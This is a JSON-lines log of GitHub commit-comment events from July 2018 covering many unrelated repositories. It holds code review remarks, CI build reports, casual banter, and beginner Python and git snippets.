{"id":"7969316368","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717129,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:38:32Z","updated_at":"2018-07-16T08:38:32Z","author_association":"MEMBER","body":"Yes, thanks for correcting the code so it works better, dht. :smile: "}},"created_at":"2018-07-16T08:38:32Z"}
{"id":"7969317000","type":"CommitCommentEvent","actor":{"login":"ApfelTV"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717130,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:38:40Z","updated_at":"2018-07-16T08:38:40Z","author_association":"NONE","body":"no u\r\n"}},"created_at":"2018-07-16T08:38:40Z"}
{"id":"7969318618","type":"CommitCommentEvent","actor":{"login":"alcomposer"},"repo":{"name":"rorywalsh/cabbage"},"payload":{"comment":{"id":29717131,"position":null,"line":null,"path":null,"commit_id":"5e1445d34a3824637d0edb2c601815bc0ead17d3","created_at":"2018-07-16T08:39:01Z","updated_at":"2018-07-16T08:39:01Z","author_association":"CONTRIBUTOR","body":"Mistake in commit name: Fix T808 & 808B: \r\n808B = T**808B**ackup"}},"created_at":"2018-07-16T08:39:01Z"}
{"id":"7969319279","type":"CommitCommentEvent","actor":{"login":"Yehonal"},"repo":{"name":"azerothcore/mod-vas-autobalance"},"payload":{"comment":{"id":29717135,"position":null,"line":null,"path":null,"commit_id":"f2233423fc38ccaec5ebaa9807c7aadc2af8a0f5","created_at":"2018-07-16T08:39:11Z","updated_at":"2018-07-16T08:39:11Z","author_association":"MEMBER","body":"It's for new module system included in recent bash system rewriting.\nIt's needed to allow searching and installing correct module versions\n\nIl Lun 16 Lug 2018, 09:24 Fabian <notifications@github.com> ha scritto:\n\n> JSON are very common in coding terms. they ussually are used for\n> information related things.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/azerothcore/mod-vas-autobalance/commit/f2233423fc38ccaec5ebaa9807c7aadc2af8a0f5#commitcomment-29716390>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAI-lOSRRXkp7fk8w6aP9IpXzLdF5SHNks5uHD-5gaJpZM4VQR2e>\n> .\n>\n"}},"created_at":"2018-07-16T08:39:11Z"}
{"id":"7969319401","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717136,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:39:13Z","updated_at":"2018-07-16T08:39:13Z","author_association":"MEMBER","body":"## No\r\n# U"}},"created_at":"2018-07-16T08:39:13Z"}
{"id":"7969321293","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29717137,"position":null,"line":null,"path":null,"commit_id":"ff9d194a1b93fdbfe189d3a6afa31f54cd8a3ae8","created_at":"2018-07-16T08:39:38Z","updated_at":"2018-07-16T08:39:38Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-16T08:39:38Z"}
{"id":"7969325882","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenPLi/enigma2-plugins"},"payload":{"comment":{"id":29717141,"position":null,"line":null,"path":null,"commit_id":"011a2811d23a64076f942dd9e457631c0de9d5ba","created_at":"2018-07-16T08:40:41Z","updated_at":"2018-07-16T08:40:41Z","author_association":"MEMBER","body":"Actually this whole stuff should be removed here and moved... as this is a second place with box change stuff"}},"created_at":"2018-07-16T08:40:41Z"}
{"id":"7969329064","type":"CommitCommentEvent","actor":{"login":"KleinGeard"},"repo":{"name":"KleinGeard/r4ds-exercise-solutions"},"payload":{"comment":{"id":29717149,"position":null,"line":null,"path":null,"commit_id":"0334a7d130bfc267e901d9810cc00b8e2a505475","created_at":"2018-07-16T08:41:27Z","updated_at":"2018-07-16T08:41:27Z","author_association":"OWNER","body":"Ah, I see it's called at the top of the document.\r\n\r\nThis library isn't mention in the book."}},"created_at":"2018-07-16T08:41:27Z"}
{"id":"7969342980","type":"CommitCommentEvent","actor":{"login":"MarkTheFreak"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717180,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:44:35Z","updated_at":"2018-07-16T08:44:35Z","author_association":"NONE","body":"why"}},"created_at":"2018-07-16T08:44:35Z"}
{"id":"7969343173","type":"CommitCommentEvent","actor":{"login":"Juslonluo"},"repo":{"name":"bigsinger/AndroidIdChanger"},"payload":{"comment":{"id":29717183,"position":null,"line":null,"path":null,"commit_id":"aa993d8ba58863e1d922efcd609943a462626bf2","created_at":"2018-07-16T08:44:38Z","updated_at":"2018-07-16T08:44:38Z","author_association":"NONE","body":"今天又发现国内一些物联卡，是20位纯数字的。好尴尬，这个值。"}},"created_at":"2018-07-16T08:44:38Z"}
{"id":"7969347780","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717193,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:45:37Z","updated_at":"2018-07-16T08:45:37Z","author_association":"CONTRIBUTOR","body":"@MarkTheFreak What do you mean?"}},"created_at":"2018-07-16T08:45:37Z"}
{"id":"7969348919","type":"CommitCommentEvent","actor":{"login":"tony-kim"},"repo":{"name":"tony-kim/jekyll-now"},"payload":{"comment":{"id":29717199,"position":2,"line":4,"path":"_posts/2014-3-3-Hello-World.md","commit_id":"e29df684bd31f193092409c9af5ce71091e2094f","created_at":"2018-07-16T08:45:52Z","updated_at":"2018-07-16T08:45:52Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-16T08:45:52Z"}
{"id":"7969349234","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717201,"position":6,"line":6,"path":"src/main/java/abc/AverageMarkComparator.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T08:45:56Z","updated_at":"2018-07-16T08:45:56Z","author_association":"COLLABORATOR","body":"Hardly readable. Please separate on two strings in format:\r\nreturn    <condition1>?<ifYes1>:\r\n                         <condition2>?<ifYes2>:<ifNo2>"}},"created_at":"2018-07-16T08:45:56Z"}
{"id":"7969349247","type":"CommitCommentEvent","actor":{"login":"MarkTheFreak"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717202,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:45:56Z","updated_at":"2018-07-16T08:45:56Z","author_association":"NONE","body":"no u"}},"created_at":"2018-07-16T08:45:56Z"}
{"id":"7969350060","type":"CommitCommentEvent","actor":{"login":"monowar84"},"repo":{"name":"KatesGitAccount/planets"},"payload":{"comment":{"id":29717206,"position":4,"line":4,"path":".gitignore","commit_id":"de203bcfa08365e72df0a3d398105b383e454ef2","created_at":"2018-07-16T08:46:07Z","updated_at":"2018-07-16T08:46:07Z","author_association":"COLLABORATOR","body":"Hi Kate I am writing here"}},"created_at":"2018-07-16T08:46:07Z"}
{"id":"7969352579","type":"CommitCommentEvent","actor":{"login":"xinglong95"},"repo":{"name":"xinglong95/Air"},"payload":{"comment":{"id":29717210,"position":null,"line":null,"path":null,"commit_id":"705c86e9ef02c181bb1be4283f4383c4b5dea7f2","created_at":"2018-07-16T08:46:39Z","updated_at":"2018-07-16T08:46:39Z","author_association":"OWNER","body":"你好，这是空调"}},"created_at":"2018-07-16T08:46:39Z"}
{"id":"7969353452","type":"CommitCommentEvent","actor":{"login":"chrisjensenuk"},"repo":{"name":"SkillsFundingAgency/das-recruit"},"payload":{"comment":{"id":29717212,"position":null,"line":null,"path":null,"commit_id":"ca6858ce7ae32e773b1ea18dac3665e87bba65d7","created_at":"2018-07-16T08:46:52Z","updated_at":"2018-07-16T08:46:52Z","author_association":"CONTRIBUTOR","body":"From the Dashboard how do you know whether to show Part 6-6 or the full vacancy preview?"}},"created_at":"2018-07-16T08:46:52Z"}
{"id":"7969354699","type":"CommitCommentEvent","actor":{"login":"disenQF"},"repo":{"name":"xaDisenPro/ArtApp"},"payload":{"comment":{"id":29717214,"position":1,"line":1,"path":"wu.txt","commit_id":"2aad0da3a1c2d357019abf9d2417e49b38827df2","created_at":"2018-07-16T08:47:10Z","updated_at":"2018-07-16T08:47:10Z","author_association":"CONTRIBUTOR","body":"jjjj"}},"created_at":"2018-07-16T08:47:10Z"}
{"id":"7969355432","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29717216,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T08:47:19Z","updated_at":"2018-07-16T08:47:19Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1693 of 1697 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 1\n * OTHER_FAULT: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.76%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.01%25-green.png)</a>\n"}},"created_at":"2018-07-16T08:47:19Z"}
{"id":"7969355944","type":"CommitCommentEvent","actor":{"login":"nishantwavhal"},"repo":{"name":"nishantwavhal/Hackathon-Git"},"payload":{"comment":{"id":29717217,"position":null,"line":null,"path":null,"commit_id":"9eda5e91ab2e440e46daae73a8880f62da4fd0a5","created_at":"2018-07-16T08:47:27Z","updated_at":"2018-07-16T08:47:27Z","author_association":"OWNER","body":"Commiting changes"}},"created_at":"2018-07-16T08:47:27Z"}
{"id":"7969359268","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29717226,"position":null,"line":null,"path":null,"commit_id":"f5ae5ec9c83109ccc546678f39ef354c7ce81633","created_at":"2018-07-16T08:48:14Z","updated_at":"2018-07-16T08:48:14Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 526](https://ci.hashicorp.engineering/viewLog.html?buildId=104077&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T08:48:14Z"}
{"id":"7969359698","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29717227,"position":null,"line":null,"path":null,"commit_id":"edd8bad5d97ee489e85504791c807f0099ef24b5","created_at":"2018-07-16T08:48:19Z","updated_at":"2018-07-16T08:48:19Z","author_association":"CONTRIBUTOR","body":"Thanks for the feedback. I'm gonna fix asap !"}},"created_at":"2018-07-16T08:48:19Z"}
{"id":"7969359811","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717228,"position":6,"line":6,"path":"src/main/java/abc/AverageMarkComparator.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T08:48:21Z","updated_at":"2018-07-16T08:48:21Z","author_association":"COLLABORATOR","body":"Read about formatting code in Java (order of fields, methods, constructors, blocks etc.)"}},"created_at":"2018-07-16T08:48:21Z"}
{"id":"7969361702","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29717232,"position":null,"line":null,"path":null,"commit_id":"f5ae5ec9c83109ccc546678f39ef354c7ce81633","created_at":"2018-07-16T08:48:46Z","updated_at":"2018-07-16T08:48:46Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 526](https://ci.hashicorp.engineering/viewLog.html?buildId=104077&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:32"}},"created_at":"2018-07-16T08:48:46Z"}
{"id":"7969366513","type":"CommitCommentEvent","actor":{"login":"neochaner"},"repo":{"name":"neochaner/neochan"},"payload":{"comment":{"id":29717245,"position":null,"line":null,"path":null,"commit_id":"bf71ad25a9e32a0654fe96ff2c4e856a7d7dae34","created_at":"2018-07-16T08:49:54Z","updated_at":"2018-07-16T08:49:54Z","author_association":"OWNER","body":"OpenIB увеличивал куки до предела, записывая в них referef удачно отправленных постов (как написано для коомуникации с js) теперь будет записывать только последний. На случай если добавим поддержку старого дизайна templates/js.\r\nА так-то его вообще можно выпилить. "}},"created_at":"2018-07-16T08:49:54Z"}
{"id":"7969370573","type":"CommitCommentEvent","actor":{"login":"volzhs"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29717258,"position":null,"line":null,"path":null,"commit_id":"c0c243ac5c0a8b03a64fdb18b0e647ae6427279c","created_at":"2018-07-16T08:50:49Z","updated_at":"2018-07-16T08:50:49Z","author_association":"MEMBER","body":"@reduz probably you missed to push \"NewRoot\" icon"}},"created_at":"2018-07-16T08:50:49Z"}
{"id":"7969373401","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"e-lwirka/warsawjs-workshop-15-battleship"},"payload":{"comment":{"id":29717269,"position":null,"line":null,"path":null,"commit_id":"a7cc440387431e5d6f2f37ebcb0e0dbb8df615f6","created_at":"2018-07-16T08:51:24Z","updated_at":"2018-07-16T08:51:24Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-16T08:51:24Z"}
{"id":"7969373936","type":"CommitCommentEvent","actor":{"login":"Nexterot"},"repo":{"name":"masyagin1998/SchoolServer"},"payload":{"comment":{"id":29717271,"position":91,"line":91,"path":"libtelco/sql-db/db.go","commit_id":"5911c85db84f3e82f93b60345340c10423ff6f02","created_at":"2018-07-16T08:51:31Z","updated_at":"2018-07-16T08:51:31Z","author_association":"COLLABORATOR","body":"**Project with database won't build #1**\r\n<br>\r\n> `+\treturn user.Permission||school.Permission;//ало сань тут точно ИЛИ а не И? `\r\n\r\n@andWhatShouldISay, точно \"ИЛИ\", т.к. либо есть разрешение у школы пользователя, либо у него самого. Одновременно и у школы,  у пользователя значения true не будет.\r\n"}},"created_at":"2018-07-16T08:51:31Z"}
{"id":"7969375004","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717274,"position":15,"line":15,"path":"src/main/java/abc/Faculty.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T08:51:45Z","updated_at":"2018-07-16T08:51:45Z","author_association":"COLLABORATOR","body":"Put here prepared specialitiesList- don't make code complicated. It should be simple readable, in your case you have several nested calls so to understand what you will get you need to seek in different classes"}},"created_at":"2018-07-16T08:51:45Z"}
{"id":"7969376488","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29717279,"position":null,"line":null,"path":null,"commit_id":"7b9b75baa3d9b70b71bf74ec59e644e91ed123ec","created_at":"2018-07-16T08:52:05Z","updated_at":"2018-07-16T08:52:05Z","author_association":"MEMBER","body":"Why plain mainline for XU4 `next`? And not\r\n\r\n    KERNELSOURCE='https://github.com/hardkernel/linux'\r\n    KERNELBRANCH='branch:odroidxu4-4.14.y'\r\n\r\nI suspect a lot of commits/PRs that are present in this branch are not avalable in upstream Linux."}},"created_at":"2018-07-16T08:52:05Z"}
{"id":"7969380795","type":"CommitCommentEvent","actor":{"login":"eranshabi"},"repo":{"name":"wix/wix-style-processor"},"payload":{"comment":{"id":29717290,"position":30,"line":95,"path":"src/defaultPlugins.ts","commit_id":"727babe34df0a5f95e6069f7fb25697f23ca6b2c","created_at":"2018-07-16T08:53:02Z","updated_at":"2018-07-16T08:53:02Z","author_association":"MEMBER","body":"you can use `Boolean` instead of `(value) => !!value`"}},"created_at":"2018-07-16T08:53:02Z"}
{"id":"7969382094","type":"CommitCommentEvent","actor":{"login":"Bonnie-B"},"repo":{"name":"Bonnie-B/Bonnie-B.github.io"},"payload":{"comment":{"id":29717294,"position":null,"line":null,"path":null,"commit_id":"144c4c0ea0242a190d77cd2d47a10eca5294c314","created_at":"2018-07-16T08:53:18Z","updated_at":"2018-07-16T08:53:18Z","author_association":"OWNER","body":"AAG talk. Not sure if having the abstract in is too much."}},"created_at":"2018-07-16T08:53:18Z"}
{"id":"7969383506","type":"CommitCommentEvent","actor":{"login":"EugenyN"},"repo":{"name":"MikePopoloski/SharpBgfx"},"payload":{"comment":{"id":29717300,"position":null,"line":null,"path":null,"commit_id":"8173737855b9dc87bdd0c06013eaf06d6fbefb5b","created_at":"2018-07-16T08:53:36Z","updated_at":"2018-07-16T08:53:36Z","author_association":"NONE","body":"Hello. TextureFormat.ASTC8x6 missed."}},"created_at":"2018-07-16T08:53:36Z"}
{"id":"7969391902","type":"CommitCommentEvent","actor":{"login":"digitalpbk"},"repo":{"name":"frontend-collective/react-sortable-tree"},"payload":{"comment":{"id":29717312,"position":60,"line":155,"path":"src/react-sortable-tree.js","commit_id":"c844c04b6248103ca42ae80e417679741c5607cd","created_at":"2018-07-16T08:55:25Z","updated_at":"2018-07-16T08:55:25Z","author_association":"NONE","body":"@wuweiweiwu The above line causes line 157 to be always false, breaks lazy loading."}},"created_at":"2018-07-16T08:55:25Z"}
{"id":"7969397173","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717327,"position":31,"line":31,"path":"src/main/java/abc/Faculty.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T08:56:33Z","updated_at":"2018-07-16T08:56:33Z","author_association":"COLLABORATOR","body":"Move to Speciality class"}},"created_at":"2018-07-16T08:56:33Z"}
{"id":"7969398026","type":"CommitCommentEvent","actor":{"login":"ituface"},"repo":{"name":"ituface/image_word"},"payload":{"comment":{"id":29717331,"position":null,"line":null,"path":null,"commit_id":"9a434e46315e280b840acc33e4df3c7880ae09ff","created_at":"2018-07-16T08:56:44Z","updated_at":"2018-07-16T08:56:44Z","author_association":"OWNER","body":"code。主要代买"}},"created_at":"2018-07-16T08:56:44Z"}
{"id":"7969400475","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717337,"position":13,"line":13,"path":"src/main/java/abc/Faculty.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T08:57:16Z","updated_at":"2018-07-16T08:57:16Z","author_association":"COLLABORATOR","body":"add scope"}},"created_at":"2018-07-16T08:57:16Z"}
{"id":"7969401165","type":"CommitCommentEvent","actor":{"login":"ituface"},"repo":{"name":"ituface/image_word"},"payload":{"comment":{"id":29717339,"position":null,"line":null,"path":null,"commit_id":"9a434e46315e280b840acc33e4df3c7880ae09ff","created_at":"2018-07-16T08:57:24Z","updated_at":"2018-07-16T08:57:24Z","author_association":"OWNER","body":"主要代码"}},"created_at":"2018-07-16T08:57:24Z"}
{"id":"7969408999","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29717353,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T08:59:01Z","updated_at":"2018-07-16T08:59:01Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - Win64-Windows-7-VisualStudio-14: Tests Failed (2405 of 2945 tests passed, 53 test warnings)\n\nMessages:\n\n * 70 tests had: ESO small diffs.\n * 564 tests had: EIO diffs.\n * 31 tests had: Table small diffs.\n * 18 tests had: MTR small diffs.\n * 504 tests had: ESO big diffs.\n * 403 tests had: MTR big diffs.\n * 503 tests had: Table big diffs.\n * 11 tests had: AUD diffs.\n * 245 tests had: SSZ big diffs.\n * 300 tests had: ZSZ big diffs.\n * 64 tests had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * Failed: 3\n\nintegration Test Summary\n * Passed: 617\n * Failed: 8\n\nregression Test Summary\n * Passed: 94\n * Failed: 529\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-81.66%25-red.png)</a> \n"}},"created_at":"2018-07-16T08:59:01Z"}
{"id":"7969410670","type":"CommitCommentEvent","actor":{"login":"masyagin1998"},"repo":{"name":"masyagin1998/SchoolServer"},"payload":{"comment":{"id":29717359,"position":91,"line":91,"path":"libtelco/sql-db/db.go","commit_id":"5911c85db84f3e82f93b60345340c10423ff6f02","created_at":"2018-07-16T08:59:21Z","updated_at":"2018-07-16T08:59:21Z","author_association":"OWNER","body":"За такой говнокод могут быть применены \"санкции\", Данила."}},"created_at":"2018-07-16T08:59:21Z"}
{"id":"7969413695","type":"CommitCommentEvent","actor":{"login":"ABossy"},"repo":{"name":"ABossy/VueJs"},"payload":{"comment":{"id":29717370,"position":null,"line":null,"path":null,"commit_id":"18ce33205d92c72ec4de62b928e73f5f83579658","created_at":"2018-07-16T09:00:01Z","updated_at":"2018-07-16T09:00:01Z","author_association":"OWNER","body":"pour initialiser le repo git :  \r\n$ git init\r\n$ git status\r\n$ git add <fichiers>\r\n$ git commit -m\"blabla\"\r\n$ git remote add origin git@github.com:ABossy/VueJs.git\r\n$ git push -u origin master\r\n "}},"created_at":"2018-07-16T09:00:01Z"}
{"id":"7969417834","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29717387,"position":null,"line":null,"path":null,"commit_id":"95e205e5dd166ef99d9f1e0a3e76a577568067a2","created_at":"2018-07-16T09:00:41Z","updated_at":"2018-07-16T09:00:41Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\ndef f1(i):\r\n    return i**2\r\n# list1=[f1(i) for i in range(11)]   #列表生成式 可传入函数\r\n# print(list1)\r\n\r\n#生成器：只有访问时才在内存中存入相应的值，只保留一个值，即当前值，用于处理大量数据\r\ngene=(f1(i) for i in range(11))\r\nprint(gene.__next__())  #取迭代器的下一个值\r\nprint(gene)\r\nfor i in gene:\r\n    print(i,end=' ')\r\n#无法用切片方式提取其中数据\r\n\r\n\r\ndef fib(max):\r\n    n,a,b=0,0,1\r\n    while n<max:\r\n        print(b)\r\n        a,b=b,a+b\r\n\r\n        n+=1\r\n    return 'done'\r\n\r\nfib(10)\r\n```"}},"created_at":"2018-07-16T09:00:41Z"}
{"id":"7969419308","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29717389,"position":null,"line":null,"path":null,"commit_id":"95e205e5dd166ef99d9f1e0a3e76a577568067a2","created_at":"2018-07-16T09:00:57Z","updated_at":"2018-07-16T09:00:57Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\n\r\ndef fib(max):\r\n    n,a,b=0,0,1\r\n    while n<max:\r\n        yield b    #此时fib为生成器,yield返回函数当前状态的值\r\n        a,b=b,a+b\r\n        n+=1\r\n    return '---END---'  #生成器异常时返回\r\n\r\n#res=fib(10)\r\ng=fib(10)\r\n#print(res.__next__())\r\nwhile True:    #用于抓住异常并返回其值\r\n    try:\r\n        x=next(g)\r\n        print('g:',x)\r\n    except StopIteration as e:\r\n        print('Generator return value:',e.value)\r\n        break\r\n\r\n\r\n```"}},"created_at":"2018-07-16T09:00:57Z"}
{"id":"7969420673","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29717392,"position":null,"line":null,"path":null,"commit_id":"95e205e5dd166ef99d9f1e0a3e76a577568067a2","created_at":"2018-07-16T09:01:14Z","updated_at":"2018-07-16T09:01:14Z","author_association":"OWNER","body":"#Downtiser\r\nimport time\r\n#并行处理：生产者，消费者模型\r\ndef consumer(name):   #函数内部有yield时函数不再是函数，而是生成器，只有用next方法才能运行函数体内容\r\n    print('%s start shopping!'%name)\r\n    while True:\r\n        product=yield  #保存当前值并返回\r\n        print('stuff [%s] is made,was brought by [%s]'%(product,name))\r\n\r\n# con=consumer('downtiser')\r\n# con.__next__() #唤醒yield，但并不给yield传值\r\n# stuff1='1080ti'\r\n# con.send(stuff1) #唤醒yield，并给yield传值\r\n#con.__next__()\r\n\r\n\r\ndef producer(name):\r\n    con1=consumer('idiot')   #此时只是调用了生成器，还未运行\r\n    con2=consumer('noob')\r\n    con1.__next__()\r\n    con2.__next__()\r\n    print('stuff starts mading!')\r\n    for i in range(10):\r\n        time.sleep(2)\r\n        print('made two stuff!')\r\n        con1.send(i)\r\n        con2.send(i)\r\n\r\n\r\nproducer('downtiser')"}},"created_at":"2018-07-16T09:01:14Z"}
{"id":"7969422841","type":"CommitCommentEvent","actor":{"login":"Nexterot"},"repo":{"name":"masyagin1998/SchoolServer"},"payload":{"comment":{"id":29717396,"position":null,"line":null,"path":null,"commit_id":"5911c85db84f3e82f93b60345340c10423ff6f02","created_at":"2018-07-16T09:01:42Z","updated_at":"2018-07-16T09:01:42Z","author_association":"COLLABORATOR","body":"**Project with database won't build #1**"}},"created_at":"2018-07-16T09:01:42Z"}
{"id":"7969423796","type":"CommitCommentEvent","actor":{"login":"rasmusolle"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717398,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T09:01:55Z","updated_at":"2018-07-16T09:01:55Z","author_association":"NONE","body":"wow nice"}},"created_at":"2018-07-16T09:01:55Z"}
{"id":"7969427604","type":"CommitCommentEvent","actor":{"login":"hydra3333"},"repo":{"name":"hydra3333/ffmpeg-windows-build-helpers-withOpenCL"},"payload":{"comment":{"id":29717405,"position":null,"line":null,"path":null,"commit_id":"4f863317dd8de70723881da5dbfd7e7da8e4bd44","created_at":"2018-07-16T09:02:46Z","updated_at":"2018-07-16T09:02:46Z","author_association":"OWNER","body":"Sorry idk, i have not re-tested in a long time.\r\nMaybe zeranoe's ? https://ffmpeg.zeranoe.com/builds/\r\nBe interesting to know what you find with your own comparison.\r\n"}},"created_at":"2018-07-16T09:02:46Z"}
{"id":"7969430629","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717411,"position":49,"line":49,"path":"src/main/java/abc/Faculty.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:03:25Z","updated_at":"2018-07-16T09:03:25Z","author_association":"COLLABORATOR","body":"this can be omitted in this case"}},"created_at":"2018-07-16T09:03:25Z"}
{"id":"7969430740","type":"CommitCommentEvent","actor":{"login":"timojuez"},"repo":{"name":"dogtopus/deda"},"payload":{"comment":{"id":29717412,"position":null,"line":null,"path":null,"commit_id":"63ec0cb78f0a16b5745e720cd13ce4414245eb2b","created_at":"2018-07-16T09:03:27Z","updated_at":"2018-07-16T09:03:27Z","author_association":"NONE","body":"Nice fix! I will use it in the next version. Thank you."}},"created_at":"2018-07-16T09:03:27Z"}
{"id":"7969431775","type":"CommitCommentEvent","actor":{"login":"ewieschhaus"},"repo":{"name":"ewieschhaus/Repository1"},"payload":{"comment":{"id":29717414,"position":null,"line":null,"path":null,"commit_id":"658ba26c5dfc68a63a767af6b0f984ecd7643e39","created_at":"2018-07-16T09:03:42Z","updated_at":"2018-07-16T09:03:42Z","author_association":"OWNER","body":"Not so much a different user, but a different workspace."}},"created_at":"2018-07-16T09:03:42Z"}
